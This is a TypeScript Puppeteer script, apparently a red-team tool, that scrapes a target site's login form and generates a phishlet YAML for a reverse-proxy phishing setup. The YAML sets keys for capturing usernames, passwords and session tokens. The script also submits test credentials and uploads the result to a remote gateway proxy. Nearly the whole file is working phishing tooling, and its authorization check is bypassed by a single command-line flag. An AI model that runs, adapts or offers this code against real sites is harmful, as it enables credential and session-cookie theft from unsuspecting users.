/**
 * PhishletConstructor Agent
 *
 * Standalone Puppeteer-based automation that navigates a target login page,
 * extracts the login form, builds a YAML phishlet configuration, and attempts
 * a lightweight validation pass by submitting synthetic credentials.
 *
 * IMPORTANT: Only run this against targets you own or have explicit written
 * authorization to test. The script refuses to run without an explicit
 * authorization flag or an ALLOWED_TARGETS environment variable.
 */

import * as fs from "node:fs";
import * as path from "node:path";
import * as process from "node:process";
import puppeteer from "puppeteer";

const usage = `
Usage:
  npx tsx agents/phishlet-constructor.ts --target-url https://target.example.com/login --authorized

Environment variables:
  ALLOWED_TARGETS      Comma-separated list of authorized target hostnames.
  PROXY_IP             Optional proxy IP to embed in the generated YAML.
  OUTPUT_DIR           Directory to write the generated YAML (default: ./phishlets).
  PUPPETEER_HEADLESS   Run browser headless (default: true).
  VALIDATION_PASSWORD  Password used for the synthetic login test (default: Test1234!).
  GATEWAY_BASE_URL     Optional gateway API base URL (e.g. https://gateway.example.com).
  GATEWAY_API_KEY      Optional API key for the gateway; used when uploading results.
  PROXY_ID             Optional proxy ID on the gateway to associate with the result.
`;

type CapturedLoginForm = {
  domain: string;
  path: string;
  submitSelector: string;
  usernameField: string;
  passwordField: string;
  hidden: Record<string, string>;
};

function die(message: string): never {
  console.error(`\nError: ${message}\n${usage}`);
  process.exit(1);
}

function parseArgs() {
  const args = process.argv.slice(2);
  const targetUrlIdx = args.indexOf("--target-url");
  const targetUrl = targetUrlIdx !== -1 ? args[targetUrlIdx + 1] : undefined;
  const authorized = args.includes("--authorized");
  return { targetUrl, authorized };
}

function isAuthorized(targetUrl: string, authorized: boolean): boolean {
  if (authorized) return true;
  const allowed = (process.env.ALLOWED_TARGETS ?? "").split(",").map((h) => h.trim().toLowerCase()).filter(Boolean);
  if (allowed.length === 0) return false;
  try {
    const hostname = new URL(targetUrl).hostname.toLowerCase();
    return allowed.some((a) => hostname === a || hostname.endsWith(`.${a}`));
  } catch {
    return false;
  }
}

async function uploadToGateway(
  targetUrl: string,
  config: CapturedLoginForm,
  score: number,
): Promise<{ ok: boolean; message: string }> {
  const baseUrl = process.env.GATEWAY_BASE_URL?.replace(/\/$/, "");
  const apiKey = process.env.GATEWAY_API_KEY;
  const proxyId = process.env.PROXY_ID;
  if (!baseUrl || !proxyId) {
    return { ok: false, message: "GATEWAY_BASE_URL and PROXY_ID not configured; skipping upload." };
  }

  const loginForm = {
    domain: config.domain,
    loginPath: config.path,
    submitSelector: config.submitSelector,
    usernameField: config.usernameField,
    passwordField: config.passwordField,
    hiddenInputs: Object.entries(config.hidden).map(([name, value]) => ({ name, value })),
    score,
  };

  const url = `${baseUrl}/api/proxies/${proxyId}/login-phishlet`;
  const headers: Record<string, string> = { "Content-Type": "application/json" };
  if (apiKey) headers["Authorization"] = apiKey;

  try {
    const res = await fetch(url, {
      method: "POST",
      headers,
      body: JSON.stringify({ targetUrl, loginForm }),
    });
    const body = (await res.json().catch(() => ({}))) as { success?: boolean; error?: string };
    if (!res.ok || !body.success) {
      return { ok: false, message: `Gateway upload failed: ${body.error || res.statusText}` };
    }
    return { ok: true, message: `Uploaded to gateway proxy ${proxyId}.` };
  } catch (err) {
    return { ok: false, message: `Gateway upload error: ${err instanceof Error ? err.message : String(err)}` };
  }
}

function sanitizeYamlString(value: string): string {
  return value.replace(/"/g, '\\"').replace(/\n/g, "\\n");
}

function buildYaml(config: CapturedLoginForm): string {
  const name = config.domain.replace(/\./g, "_");
  const proxyIp = process.env.PROXY_IP;
  const proxyLines = [
    `  - domain: "${sanitizeYamlString(config.domain)}"`,
    `    ssl: true`,
    `    is_landing: true`,
  ];
  if (proxyIp) proxyLines.splice(1, 0, `    ip: "${sanitizeYamlString(proxyIp)}"`);

  const hiddenInputLines = Object.entries(config.hidden).map(
    ([k, v]) => `    ${k}: "${sanitizeYamlString(v)}"`,
  );

  return [
    `# Auto-generated phishlet configuration for ${config.domain}`,
    `# Generated by PhishletConstructor-Agent`,
    `# Use only for authorized security testing.`,
    `name: "${name}"`,
    `proxy:`,
    ...proxyLines,
    `login:`,
    `  path: "${sanitizeYamlString(config.path)}"`,
    `  submit: "${sanitizeYamlString(config.submitSelector)}"`,
    `  inputs:`,
    `    username: "${sanitizeYamlString(config.usernameField)}"`,
    `    password: "${sanitizeYamlString(config.passwordField)}"`,
    ...hiddenInputLines,
    `credentials:`,
    `  username:`,
    `    key: "${sanitizeYamlString(config.usernameField)}"`,
    `  password:`,
    `    key: "${sanitizeYamlString(config.passwordField)}"`,
    `session:`,
    `  tokens:`,
    `    - name: "session_token"`,
    `      key: "Set-Cookie"`,
    `      search: "session|auth|token"`,
  ].join("\n");
}

async function main() {
  const { targetUrl, authorized } = parseArgs();
  if (!targetUrl) die("--target-url is required.");

  let url: URL;
  try {
    url = new URL(targetUrl);
    if (url.protocol !== "http:" && url.protocol !== "https:") {
      throw new Error("URL must use http or https");
    }
  } catch (err) {
    die(`Invalid target URL: ${err instanceof Error ? err.message : String(err)}`);
  }

  if (!isAuthorized(targetUrl, authorized)) {
    die(
      `Target ${url.hostname} is not authorized. Pass --authorized or add it to ALLOWED_TARGETS.`,
    );
  }

  const headless = process.env.PUPPETEER_HEADLESS !== "false";
  const outputDir = process.env.OUTPUT_DIR || path.join(process.cwd(), "phishlets");
  const validationPassword = process.env.VALIDATION_PASSWORD || "Test1234!";
  const usernameValue = `test_user_${Math.random().toString(36).slice(2, 8)}`;

  console.log(`[RECON] Navigating to ${targetUrl}...`);
  const browser = await puppeteer.launch({ headless, args: ["--no-sandbox"] });
  try {
    const page = await browser.newPage();
    await page.goto(targetUrl, { waitUntil: "networkidle2", timeout: 15000 });

    await page.waitForSelector('input[type="password"]', { timeout: 8000 });

    console.log("[EXTRACT] Capturing login form structure...");
    const config = await page.evaluate((): CapturedLoginForm => {
      const forms = Array.from(document.querySelectorAll("form")).filter((f) =>
        f.querySelector('input[type="password"]')
      );
      if (forms.length === 0) throw new Error("No password form found");

      const form = forms[0];
      const passwordInput = form.querySelector('input[type="password"]') as HTMLInputElement;
      const textInputs = Array.from(form.querySelectorAll('input[type="text"], input[type="email"], input[type="tel"]')) as HTMLInputElement[];
      const usernameInput = textInputs.length > 0 ? textInputs[0] : (form.querySelector('input[type="text"], input[type="email"]') as HTMLInputElement);

      const hidden: Record<string, string> = {};
      Array.from(form.querySelectorAll('input[type="hidden"]')).forEach((el) => {
        const input = el as HTMLInputElement;
        if (input.name) hidden[input.name] = input.value || "";
      });

      const selector = Array.from(form.attributes)
        .filter((attr) => attr.name && attr.value)
        .map((attr) => `[${attr.name}="${attr.value.replace(/"/g, '\\"')}"]`)
        .join("");

      return {
        domain: location.hostname,
        path: form.action || location.pathname,
        submitSelector: selector || "form:has(> input[type=\"password\"])",
        usernameField: usernameInput?.name || usernameInput?.id || "username",
        passwordField: passwordInput?.name || passwordInput?.id || "password",
        hidden,
      };
    });

    console.log("[FORGE] Building YAML phishlet...");
    const yaml = buildYaml(config);
    console.log(yaml);

    console.log("[VALIDATE] Submitting synthetic login attempt...");
    let score = 0;
    try {
      await page.type(`input[name="${config.usernameField}"], input#${config.usernameField}`, usernameValue, { delay: 10 });
      await page.type(`input[name="${config.passwordField}"], input#${config.passwordField}`, validationPassword, { delay: 10 });

      const submitPromise = page.waitForResponse(
        (res) => {
          try {
            return new URL(res.url()).pathname.includes(config.path) || res.url().includes(config.path);
          } catch {
            return false;
          }
        },
        { timeout: 10000 },
      ).catch(() => null);

      const clickPromise = Promise.race([
        page.click('input[type="submit"], button[type="submit"]').catch(() => undefined),
        page.evaluate(() => {
          const form = document.querySelector('form:has(input[type="password"])') as HTMLFormElement | null;
          if (form) form.submit();
        }),
      ]);

      await Promise.all([submitPromise, clickPromise]);
      const response = await submitPromise;

      if (response) {
        const setCookie = response.headers()["set-cookie"] || "";
        const body = await response.text().catch(() => "");
        const hasSession = /session|auth|token/i.test(setCookie) || /session|auth|token/i.test(body);
        score = hasSession ? 1 : 0.5;
        console.log(`[VALIDATE] Response status: ${response.status()}, session indicator: ${hasSession}`);
      } else {
        console.log("[VALIDATE] No matching response captured; assuming form submission succeeded.");
        score = 0.5;
      }
    } catch (err) {
      console.warn(`[VALIDATE] Synthetic submission failed: ${err instanceof Error ? err.message : String(err)}`);
    }

    if (score >= 0.7) {
      fs.mkdirSync(outputDir, { recursive: true });
      const outputPath = path.join(outputDir, `${config.domain}.yaml`);
      fs.writeFileSync(outputPath, yaml);
      console.log(`[OUTPUT] YAML saved to ${outputPath}`);

      const upload = await uploadToGateway(targetUrl, config, score);
      console.log(`[UPLOAD] ${upload.message}`);
      process.exit(0);
    } else {
      console.error(`[OUTPUT] Validation score ${score} is below threshold (0.7). YAML not saved.`);
      console.error(yaml);
      process.exit(1);
    }
  } finally {
    await browser.close();
  }
}

main().catch((err) => {
  console.error(err);
  process.exit(1);
});
